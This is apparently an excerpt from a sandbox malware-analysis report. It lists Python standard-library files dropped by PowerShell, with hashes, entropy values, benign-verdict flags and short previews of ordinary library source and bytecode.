                                                                                                    Preview:.........U.f.v........................&.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.Z.e.j...................d.v.r.d.x.Z.Z.n.d.d.l.Z...e.j...........................Z.e.d.k(..Z.e.d.k(..Z.d.Z.d.Z.e.r.d.Z.d.Z.g.d...\...Z.Z.Z.Z.e.Z.e.Z...e.e...........G.d...d.................Z...G.d...d.........Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z d...Z!d...Z"d...Z#..d.d.l$Z$..e%e$d.d.........Z&..e%e$d.d.........Z'e$jP..................Z)d...Z+d ..Z,d!..Z-d"..Z.e.r.e.e.g.Z/n4e.j...................d#k(..r.e.e.e!g.Z/n.e.j...................d$k(..r.g.Z/n.e.r.e!g.Z/n.e.e.e.e!e g.Z/e.j`..................d%k(..r.e,g.e/z...Z1n.e.j`..................d&k(..r.e-g.e/z...Z1n.e/Z1d.a2d'..Z3d.a4d2d(..Z5d)..Z6d*..Z7d+..Z8d,..Z9..e.d-........Z:..e.d.........Z;..e.d/........Z<..e.d0........Z=e>d1k(..r...e9..........y.y.#.e*$.r...d.Z$d.Z&d.Z'd.Z)Y...w.x.Y.w.)3aQ...UUID objects (universally unique identifiers) according to RFC 4122...This module provides immutable UUID objects (class UUID) and the functions.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23831
                                                                                                    Entropy (8bit):5.368242343429052
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:2qnFTtE80PtQo6pT1GFOg4DSnSdBTEYTHnNFNe35pwKVvBb2o7qPOjIV:2qFTtE80PtQo6NmX4uSnEYTtFNe35pJO
                                                                                                    MD5:40147E4AF97140F5A9B526EB891B11E9
                                                                                                    SHA1:E7DB64F59975D922E98C80437692FA461F15D46C
                                                                                                    SHA-256:81E9996932122F1D33B8DB5319F1C75F26B52B636855F41319BF73732EB2502D
                                                                                                    SHA-512:1F534767745779667873D84C6F28A3F04FFCCF69F06C26DE578A96AE43C530DE3EC8D57ECC897C9D9586B927553F5AB68B8C0ED001D790F28BDE99F00766D1E9
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.fTW........................8.....d.Z.d.d.l.Z.g.d...Z.d0d...Z.d1d...Z.d...Z.d...Z.e.Z.d...Z.e.Z.d...Z.d.e.d.d.d.f.d...Z.e.d.d.f.d...Z.d...Z.d...Z...G.d...d.e.........Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d2d.d...d...Z.....d3d...Z...G.d...d e.........Z...G.d!..d"e.........Z.d#Z.e.f.e.j@..................d$..d%..Z!d&..Z"..d.d'l#m$Z$m%Z%m&Z&m.Z.m.Z.m'Z'..e%Z(e&Z)d(Z*..e.e.jZ............................e*sA..e.e.d+........s8..e.d)e/d,d..-............e.d.e/d../............e.d.e0d../............e.d.e1d../............e.d.e2d../..........[*y.#.e+$.r...g.Z$d)Z(i.Z)d.a,d*..Z'd.Z*Y..kw.x.Y.w.)4z&Python part of the warnings subsystem......N)...warn..warn_explicit..showwarning..formatwarning..filterwarnings..simplefilter..resetwarnings..catch_warningsc.....................:.....t.........|.|.|.|.|.|.........}.t.........|...........y.)..7Hook to write a warning to a file; replace if you like.N)...WarningMessage.._showwarnmsg_impl)...message..category..filename..lineno..file..li
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):31387
                                                                                                    Entropy (8bit):5.006178486752796
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:tvDi/uW0pCXF2wRp2c1mfbmWra0c7R1Du:tbi/uW0i2wZmfb3ZcLu
                                                                                                    MD5:24171D8A806837859CD0E620394320B7
                                                                                                    SHA1:513B244EECC95F59F1A7E9163046A741733B582E
                                                                                                    SHA-256:82696BDE8A57EF6B2BDB721E912751C710A50E1FB48C0DF2E790FB4FA9329A57
                                                                                                    SHA-512:B761988624CCEDD69410FA2F58CE3A199F0C9A49C654C092C6C4DD1C4AB2B2E9EEDCD327679ACF82FA3801C66AF780228A38449D95075582036C1CCA0484B444
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f.V........................2.....d.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.e.e.f.Z.g.d...Z.e.j$..................j'..................e.............G.d...d.e.........Z...G.d...d.e.j*..........................Z...G.d...d.e.........Z...G.d...d.e.j*..........................Z...G.d...d.........Z.y.).ztWeak reference support for Python...This module is an implementation of PEP 205:..https://peps.python.org/pep-0205/......)...getweakrefcount..getweakrefs..ref..proxy..CallableProxyType..ProxyType..ReferenceType.._remove_dead_weakref)...WeakSet.._IterationGuardN).r....r....r....r......WeakKeyDictionaryr....r....r......ProxyTypes..WeakValueDictionaryr......WeakMethod..finalizec.....................R.......e.Z.d.Z.d.Z.d.Z.d.d...Z...f.d...Z.d...Z.d...Z.e.j...................Z...x.Z.S.).r....z.. A custom `weakref.ref` subclass which simulates a weak reference to. a bound method, working around the lifetime problem of bound methods.. )..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4129
                                                                                                    Entropy (8bit):5.054915225610184
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:1086w0VnCwE4/o5I2Wqpt8u/GqhqCbuwAknVbRo61RmT+se8R2HR7:10G0VVoW+GqI4uwfnVbRo2Rk4R7
                                                                                                    MD5:41F88833D549197CEC2C7B52CB9D651E
                                                                                                    SHA1:F01590397FAFAEBC2F6273BE125C02D518D7A3B5
                                                                                                    SHA-256:4BBEDE7FC7B15C30DD3CDD54F40347DD21F9B6E65D1CA38BF831A7B50D456583
                                                                                                    SHA-512:5CB991A99CA16B6137BADED771B736090F6F25ED885B35B1F681F4964F0C503867CB1ECCD05CF25F5DCF537898878430F53B051CA197A870B050BF992721BA8F
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: aba.bat, Detection: malicious, Browse
                                                                                                    • Filename: tut.bat, Detection: malicious, Browse
                                                                                                    • Filename: 8n3W4yKYeB.exe, Detection: malicious, Browse
                                                                                                    • Filename: contract_review.exe, Detection: malicious, Browse
                                                                                                    • Filename: new.bat, Detection: malicious, Browse
                                                                                                    • Filename: new.bat, Detection: malicious, Browse
                                                                                                    • Filename: pypa.py, Detection: malicious, Browse
                                                                                                    Preview:"""Shared AIX support functions."""....import sys..import sysconfig......# Taken from _osx_support _read_output function..def _read_cmd_output(commandstring, capture_stderr=False):.. """Output from successful command execution or None""".. # Similar to os.popen(commandstring, "r").read(),.. # but without actually using os.popen because that.. # function is not usable during python bootstrap... import os.. import contextlib.. fp = open("/tmp/_aix_support.%s"%(.. os.getpid(),), "w+b").... with contextlib.closing(fp) as fp:.. if capture_stderr:.. cmd = "%s >'%s' 2>&1" % (commandstring, fp.name).. else:.. cmd = "%s 2>/dev/null >'%s'" % (commandstring, fp.name).. return fp.read() if not os.system(cmd) else None......def _aix_tag(vrtl, bd):.. # type: (List[int], int) -> str.. # Infer the ABI bitwidth from maxsize (assuming 64 bit as the default).. _sz = 32 if sys.maxsize == (2**31-1) else 64.. _bd = bd if b
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33255
                                                                                                    Entropy (8bit):4.57321505202262
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:IOPxpq3OCTN1Ewkx023y0SuqlTWbbYXxeF6tTgA/rTNq4UBR2npWtvVUCloh:lPxPCTqYh4kNpivVUCloh
                                                                                                    MD5:B10776F4C7D732CED7BD8A708E642CF3
                                                                                                    SHA1:964C2AF043BC4023F844497EBAEE379D9575FFEF
                                                                                                    SHA-256:C3454744BF6B649F19E91CA1411E88FFD608E86F58375F3F8CEE5CA53473E331
                                                                                                    SHA-512:AB64E37BBCE55D483EC48E3D87F54128048587DDED0C9A73E6584EE81EE60A30AA477AC5981A344ACD803CE4D7B024350ED32771C9E8D37A751F34DDC55F360C
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: aba.bat, Detection: malicious, Browse
                                                                                                    • Filename: tut.bat, Detection: malicious, Browse
                                                                                                    • Filename: 8n3W4yKYeB.exe, Detection: malicious, Browse
                                                                                                    • Filename: contract_review.exe, Detection: malicious, Browse
                                                                                                    • Filename: new.bat, Detection: malicious, Browse
                                                                                                    • Filename: new.bat, Detection: malicious, Browse
                                                                                                    • Filename: pypa.py, Detection: malicious, Browse
                                                                                                    Preview:# Copyright 2007 Google, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Abstract Base Classes (ABCs) for collections, according to PEP 3119.....Unit tests are in test_collections..."""....############ Maintenance notes #########################################..#..# ABCs are different from other standard library modules in that they..# specify compliance tests. In general, once an ABC has been published,..# new methods (either abstract or concrete) cannot be added...#..# Though classes that inherit from an ABC would automatically receive a..# new mixin method, registered classes would become non-compliant and..# violate the contract promised by ``isinstance(someobj, SomeABC)``...#..# Though irritating, the correct procedure for adding new abstract or..# mixin methods is to create a new ABC as a subclass of the previous..# ABC. For example, union(), intersection(), and difference() cannot..# be added to Set but could go into a new ABC that extends Se
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9013
                                                                                                    Entropy (8bit):5.071668224051392
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:jX+gYVVcndom2qXur3co6d/f1OlQcrG5EbhqRbRq:T+gYVVcnrkco6d/f1OlQcC5ES1q
                                                                                                    MD5:4373F824346A53ECD29028BEF4655F56
                                                                                                    SHA1:88727AA744742F6C1C528C92DAA928C84933D995
                                                                                                    SHA-256:10C81E8803CFFAAC8BDF085CD01EA948C3ADFA32263B2D452BAFD5B5519410F6
                                                                                                    SHA-512:4032ABD13CB607F3D018B41D1B62EBB57195A54D0ED0F7E1F3D32BCA565A1D837BCA75E8E032296ADC25C9A1BB07C0AA77EB696DACEE2EC5065A49EDF7798A28
                                                                                                    Malicious:false
                                                                                                    Preview:# This module is used to map the old Python 2 names to the new names used in..# Python 3 for the pickle module. This needed to make pickle streams..# generated with Python 2 loadable by Python 3.....# This is a copy of lib2to3.fixes.fix_imports.MAPPING. We cannot import..# lib2to3 and use the mapping defined there, because lib2to3 uses pickle...# Thus, this could cause the module to be imported recursively...IMPORT_MAPPING = {.. '__builtin__' : 'builtins',.. 'copy_reg': 'copyreg',.. 'Queue': 'queue',.. 'SocketServer': 'socketserver',.. 'ConfigParser': 'configparser',.. 'repr': 'reprlib',.. 'tkFileDialog': 'tkinter.filedialog',.. 'tkSimpleDialog': 'tkinter.simpledialog',.. 'tkColorChooser': 'tkinter.colorchooser',.. 'tkCommonDialog': 'tkinter.commondialog',.. 'Dialog': 'tkinter.dialog',.. 'Tkdnd': 'tkinter.dnd',.. 'tkFont': 'tkinter.font',.. 'tkMessageBox': 'tkinter.messagebox',.. 'ScrolledText': 'tkinter.scrolledtext',.. 'Tkconstants':
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5843
                                                                                                    Entropy (8bit):4.312570122004757
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ArOasdGagyvLQOAj+pPbO6bf/Zvlf0rwazuza6:eOasdbtlb/fcrwazuza6
                                                                                                    MD5:F75E9299E14E9B11FD7DAE94D061253E
                                                                                                    SHA1:6025D13A35D283496DC83444366FE93E22B03B61
                                                                                                    SHA-256:A10CF1A317374641BCDB8252499E9CB9D4D6E774AC724EDFDDDD0433EAD771D9
                                                                                                    SHA-512:BEE88E9C44A2477E7679F47F414FF8327AD06EF4E81D65405A1D55E9684040838C9F30F3F0A35FF0C5A7E850B858FE83E48734BE7EA171A1F5DBB75FB45A2FB7
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Internal classes used by the gzip, lzma and bz2 modules"""....import io..import sys....BUFFER_SIZE = io.DEFAULT_BUFFER_SIZE # Compressed data read chunk size......class BaseStream(io.BufferedIOBase):.. """Mode-checking helper functions.""".... def _check_not_closed(self):.. if self.closed:.. raise ValueError("I/O operation on closed file").... def _check_can_read(self):.. if not self.readable():.. raise io.UnsupportedOperation("File not open for reading").... def _check_can_write(self):.. if not self.writable():.. raise io.UnsupportedOperation("File not open for writing").... def _check_can_seek(self):.. if not self.readable():.. raise io.UnsupportedOperation("Seeking is only supported ".. "on files open for reading").. if not self.seekable():.. raise io.UnsupportedOperation("The underlying file object "..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15049
                                                                                                    Entropy (8bit):4.144690404366886
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:hJdW3aalUU2IJWEY4tokA+jFW/tFoak6iExy/LemE/9ueOU:hJRalUU2IJWIo+jEFGaw1iN
                                                                                                    MD5:2DFE8125174DDC3D0694E41EB8489C58
                                                                                                    SHA1:EF097AC9988D1E06BE47D771008B53797682156D
                                                                                                    SHA-256:914361CF055D5D2E1B69A2603A5C94B22DEDB987D72CE9F791AFEC0524718F28
                                                                                                    SHA-512:E5657D6619EA50AEE6051808F5C153B75438C97231010F898D9884937C7370241C4C41FA695B002D1AEA0489994F4FD96D3ADE037ECF30D761A99019F9E1E043
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Shared support for scanning document type declarations in HTML and XHTML.....This module is used as a foundation for the html.parser module. It has no..documented public API and should not be used directly....."""....import re...._declname_match = re.compile(r'[a-zA-Z][-_.a-zA-Z0-9]*\s*').match.._declstringlit_match = re.compile(r'(\'[^\']*\'|"[^"]*")\s*').match.._commentclose = re.compile(r'--\s*>').._markedsectionclose = re.compile(r']\s*]\s*>')....# An analysis of the MS-Word extensions is available at..# http://www.planetpublish.com/xmlarena/xap/Thursday/WordtoXML.pdf...._msmarkedsectionclose = re.compile(r']\s*>')....del re......class ParserBase:.. """Parser base class which provides some common support methods used.. by the SGML/HTML and XHTML parsers.""".... def __init__(self):.. if self.__class__ is ParserBase:.. raise RuntimeError(.. "_markupbase.ParserBase must be subclassed").... def reset(self):.. self.lineno = 1..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22602
                                                                                                    Entropy (8bit):4.723979551934765
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:KEQb8Fu0jFaUTj065gw4DehE58J+pPSUbjaMVqnV6sxlVItVnCfvQY+y1q6NT:KB8Fu0jFaYj0sgve81pP3SAYE2
                                                                                                    MD5:09B076187C2B59E07F5C46CF47B03DE7
                                                                                                    SHA1:26C2EDF625F3FEB5C6FBFE95646F3C861BB61033
                                                                                                    SHA-256:B72A3C3EC5AEF4C8B67A27482DC5730F6CA0A1F763C73D7F5EDD37B7A180AABB
                                                                                                    SHA-512:BA12EA788469813D7FFCC0F6E8CCB89943ECDAECC6C7CA6DD53C43351B7CB191A7AFC6DA62C0DB62037F97B4F31787644239E7C56488F948D4F86977F6C46843
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Shared OS X support functions."""....import os..import re..import sys....__all__ = [.. 'compiler_fixup',.. 'customize_config_vars',.. 'customize_compiler',.. 'get_platform_osx',..]....# configuration variables that may contain universal build flags,..# like "-arch" or "-isdkroot", that may need customization for..# the user environment.._UNIVERSAL_CONFIG_VARS = ('CFLAGS', 'LDFLAGS', 'CPPFLAGS', 'BASECFLAGS',.. 'BLDSHARED', 'LDSHARED', 'CC', 'CXX',.. 'PY_CFLAGS', 'PY_LDFLAGS', 'PY_CPPFLAGS',.. 'PY_CORE_CFLAGS', 'PY_CORE_LDFLAGS')....# configuration variables that may contain compiler calls.._COMPILER_CONFIG_VARS = ('BLDSHARED', 'LDSHARED', 'CC', 'CXX')....# prefix added to original configuration variable names.._INITPRE = '_OSX_SUPPORT_INITIAL_'......def _find_executable(executable, path=None):.. """Tries to find 'executable' in the directories listed in 'path'..... A string listing dir
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6336
                                                                                                    Entropy (8bit):4.398612520141537
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:tChBz2a5ZMoU3JhZqwCtb4kmAp0PT5L7AH4/kt/E/StLp/kL/5:tChtjgJhZZKb4qH/7O
                                                                                                    MD5:E9F2D6D09F06D7E0772B74B32759881C
                                                                                                    SHA1:6E4A2145565B7B9436CB7DB5CF18FA97E9B3BEE0
                                                                                                    SHA-256:8F790C97331A66EA442964314843F7CC8863FB3D9B899183F6D02598D4361A5C
                                                                                                    SHA-512:D3D22D17387A04B79AB54C7F71E994A075AB309057A8F98A3972E0F17535C4D905342D282ECF3D1A8A99351BBC8AEC207E7E277B0377255572153A80EFBB07A6
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:from _weakrefset import WeakSet......def get_cache_token():.. """Returns the current ABC cache token..... The token is an opaque object (supporting equality testing) identifying the.. current version of the ABC cache for virtual subclasses. The token changes.. with every call to ``register()`` on any ABC... """.. return ABCMeta._abc_invalidation_counter......class ABCMeta(type):.. """Metaclass for defining Abstract Base Classes (ABCs)..... Use this metaclass to create an ABC. An ABC can be subclassed.. directly, and then acts as a mix-in class. You can also register.. unrelated concrete classes (even built-in classes) and unrelated.. ABCs as 'virtual subclasses' -- these and their descendants will.. be considered subclasses of the registering ABC by the built-in.. issubclass() function, but the registering ABC won't show up in.. their MRO (Method Resolution Order) nor will method.. implementations defined by the registering ABC be callable
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):94740
                                                                                                    Entropy (8bit):4.486813729670233
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:a9IQYbeLy7YOd9BF87J6lQ3r6yZeUE/v0B11YwHYX:a9IQYS2YOdm7J2lyMUhc+s
                                                                                                    MD5:6A6D2E4E3731246BA2EC11BFB0B8AA6E
                                                                                                    SHA1:38672C2367F40B470B68900453A9B154DD052EF2
                                                                                                    SHA-256:5D59A58B96462239916D5E3F24A161BEC46A70D7CB12C21C7BD14B39B46AEAD1
                                                                                                    SHA-512:C003A47EC209F925230ABAA969B6D0202F0CEB7B36F338BB38A95F8EFE95846AA180636AE916638B8F79361B50826283404117FD9E2D5E5B05C772F342C684BA
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Concrete date/time and related types.....See http://www.iana.org/time-zones/repository/tz-link.html for..time zone and DST data sources..."""....__all__ = ("date", "datetime", "time", "timedelta", "timezone", "tzinfo",.. "MINYEAR", "MAXYEAR", "UTC")......import time as _time..import math as _math..import sys..from operator import index as _index....def _cmp(x, y):.. return 0 if x == y else 1 if x > y else -1....def _get_class_module(self):.. module_name = self.__class__.__module__.. if module_name == '_pydatetime':.. return 'datetime'.. else:.. return module_name....MINYEAR = 1..MAXYEAR = 9999.._MAXORDINAL = 3652059 # date.max.toordinal()....# Utility functions, adapted from Python's Demo/classes/Dates.py, which..# also assumes the current Gregorian calendar indefinitely extended in..# both directions. Difference: Dates.py calls January 1 of year 0 day..# number 1. The code here calls January 1 of year 1 day number 1. This is..# to match the
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):235645
                                                                                                    Entropy (8bit):4.563560590127949
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:fPpNAkfLyemfbPcKcNZuUxOapxHPfm+LymnEvD:HvxPA
                                                                                                    MD5:6B5437EA2015E0F1F0CFBB24D18842AB
                                                                                                    SHA1:2328558422C867B7BF586435989AABE164E9422C
                                                                                                    SHA-256:B4DE5BF447E53FD324EC33A95D32193C1B7DD12B375481566CF25AC2D348F869
                                                                                                    SHA-512:6AB6CBC1E262512D34991BB68FEE9F8C33D887107EA1B2EDCEF005F06B33E4D1A2B0D812A0DF0456D8352148D65B601D9ACCD6660C3B5C3F5413F712858779E2
                                                                                                    Malicious:false
                                                                                                    Preview:# Copyright (c) 2004 Python Software Foundation...# All rights reserved.....# Written by Eric Price <eprice at tjhsst.edu>..# and Facundo Batista <facundo at taniquetil.com.ar>..# and Raymond Hettinger <python at rcn.com>..# and Aahz <aahz at pobox.com>..# and Tim Peters....# This module should be kept in sync with the latest updates of the..# IBM specification as it evolves. Those updates will be treated..# as bug fixes (deviation from the spec is a compatibility, usability..# bug) and will be backported. At this point the spec is stabilizing..# and the updates are becoming fewer, smaller, and less significant....."""..This is an implementation of decimal floating point arithmetic based on..the General Decimal Arithmetic Specification:.... http://speleotrove.com/decimal/decarith.html....and IEEE standard 854-1987:.... http://en.wikipedia.org/wiki/IEEE_854-1987....Decimal floating point has finite precision with arbitrarily large bounds.....The purpose of this modul
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):96291
                                                                                                    Entropy (8bit):4.364506935988488
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:viNtkV5SO52T4fWEai+6wsWB/5bjQsngmRAUd:viNtkr5SuWEai+6bWp5bjLgmR5
                                                                                                    MD5:9511989045D3247243E25A31B64B259A
                                                                                                    SHA1:800A8C327F47BCC41F0724162C00B7FE8E29D0E2
                                                                                                    SHA-256:3A2AAF9CFFB2FD7CF4F27DB0B8C16160C08FBA69D55C7237865C9C9D7BB92444
                                                                                                    SHA-512:DB0D4AEC0F57EF2E43A235E8A23BD503966346CB717AAEF963D2E0796025133508F623AD1E6E80CF84D388008E73196AF02BD4C209F089CE09C827D24CD440DF
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""..Python implementation of the io module..."""....import os..import abc..import codecs..import errno..import stat..import sys..# Import _thread instead of threading to reduce startup cost..from _thread import allocate_lock as Lock..if sys.platform in {'win32', 'cygwin'}:.. from msvcrt import setmode as _setmode..else:.. _setmode = None....import io..from io import (__all__, SEEK_SET, SEEK_CUR, SEEK_END)....valid_seek_flags = {0, 1, 2} # Hardwired values..if hasattr(os, 'SEEK_HOLE') :.. valid_seek_flags.add(os.SEEK_HOLE).. valid_seek_flags.add(os.SEEK_DATA)....# open() uses st_blksize whenever we can..DEFAULT_BUFFER_SIZE = 8 * 1024 # bytes....# NOTE: Base classes defined here are registered with the "official" ABCs..# defined in io.py. We don't use real inheritance though, because we don't want..# to inherit the C implementations.....# Rebind for compatibility..BlockingIOError = BlockingIOError....# Does io.IOBase finalizer log the exception if the close() method fails?
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9332
                                                                                                    Entropy (8bit):4.649641793285662
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:ibiuRsd32//Cs0uRC7F6Uq/WRTus50sMEE4EDkaq71uqhCkiu66V:ibiuRc3uR+oct5TSknRxCnc
                                                                                                    MD5:210849258B55A6D3D5174A928D20D355
                                                                                                    SHA1:C3C7B26339C20AC1FE5570AA3E936C5C6BDC27C6
                                                                                                    SHA-256:998AAA9A183839BEB0582E98B1C5C8BD061B4706A4C54A1F5F42388D60DE9968
                                                                                                    SHA-512:9B432E4DBCE50759C067DA26A5FC5984B08E25A8D1545246EED4C851C9C319A1C2FC3700D7C7866C523FA4C1927F058067A404775B916D0B2C783E13202B1F29
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Python implementations of some algorithms for use by longobject.c...The goal is to provide asymptotically faster algorithms that can be..used for operations on integers with many digits. In those cases, the..performance overhead of the Python implementation is not significant..since the asymptotic behavior is what dominates runtime. Functions..provided by this module should be considered private and not part of any..public API.....Note: for ease of maintainability, please prefer clear code and avoid.."micro-optimizations". This module will only be imported and used for..integers with a huge number of digits. Saving a few microseconds with..tricky or non-obvious code is not worth it. For people looking for..maximum performance, they should use something like gmpy2."""....import re..import decimal......def int_to_decimal(n):.. """Asymptotically fast conversion of an 'int' to Decimal.""".... # Function due to Tim Peters. See GH issue #90716 for details... # https://github
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3231
                                                                                                    Entropy (8bit):4.290837712719538
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:LCIcLnTrq7B8nUOOU3ciXy0JFBOjpQ8sHLf1vHKGysSO4:LmnTWjOOU3cc0+rxHKGB94
                                                                                                    MD5:2E95AAF9BD176B03867862B6DC08626A
                                                                                                    SHA1:3AFA2761119AF29519DC3DAD3D6C1A5ABCA67108
                                                                                                    SHA-256:924F95FD516ECAEA9C9AF540DC0796FB15EC17D8C42B59B90CF57CFE15962E2E
                                                                                                    SHA-512:080495FB15E7C658094CFE262A8BD884C30580FD6E80839D15873F27BE675247E2E8AEC603D39B614591A01ED49F5A07DD2ACE46181F14B650C5E9EC9BB5C292
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""..The objects used by the site module to add custom builtins..."""....# Those objects are almost immortal and they keep a reference to their module..# globals. Defining them in the site module would keep too many references..# alive...# Note this means this module should also avoid keep things alive in its..# globals.....import sys....class Quitter(object):.. def __init__(self, name, eof):.. self.name = name.. self.eof = eof.. def __repr__(self):.. return 'Use %s() or %s to exit' % (self.name, self.eof).. def __call__(self, code=None):.. # Shells like IDLE catch the SystemExit, but listen when their.. # stdin wrapper is closed... try:.. sys.stdin.close().. except:.. pass.. raise SystemExit(code)......class _Printer(object):.. """interactive prompt objects for printing the license text, a list of.. contributors and the copyright notice.""".... MAXLINES = 23.... def __init__(self, name,
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25180
                                                                                                    Entropy (8bit):4.561270108182618
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:C1pVFxVyOs4/p6WSDmyeMjjiIltKcKdrxrTJdNtxn/kNVGn/UrbrupREQ43LVkZM:C1FxIO7/p6Woph/5uZTJrn/gVHupQCi
                                                                                                    MD5:E26D242110C2938D1C7007078DE61DF1
                                                                                                    SHA1:04255EA46E155F82C31F3252B95F97500BAE2CE6
                                                                                                    SHA-256:8961AA3BF0FE6D677D26F83EA25C72685A6C7DDE51D3BBD2EC4A2A405676A320
                                                                                                    SHA-512:B3263902E8B2BFA72D6925C7C090E31A7D64060ECCD26810C360DD2C6956ED1E41B37301932BFCF4B2874099F10B6363F1EA8EEEA91BF390697F1BF1E29C652F
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Strptime-related classes and functions.....CLASSES:.. LocaleTime -- Discovers and stores locale-specific time information.. TimeRE -- Creates regexes for pattern matching a string of text containing.. time information....FUNCTIONS:.. _getlang -- Figure out what language is being used for the locale.. strptime -- Calculates the time struct represented by the passed-in string...."""..import time..import locale..import calendar..from re import compile as re_compile..from re import IGNORECASE..from re import escape as re_escape..from datetime import (date as datetime_date,.. timedelta as datetime_timedelta,.. timezone as datetime_timezone)..from _thread import allocate_lock as _thread_allocate_lock....__all__ = []....def _getlang():.. # Figure out what the current language is set to... return locale.getlocale(locale.LC_TIME)....class LocaleTime(object):.. """Stores and handles locale-specific information relat
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7462
                                                                                                    Entropy (8bit):4.6221334949688195
                                                                                                    Encrypted:false
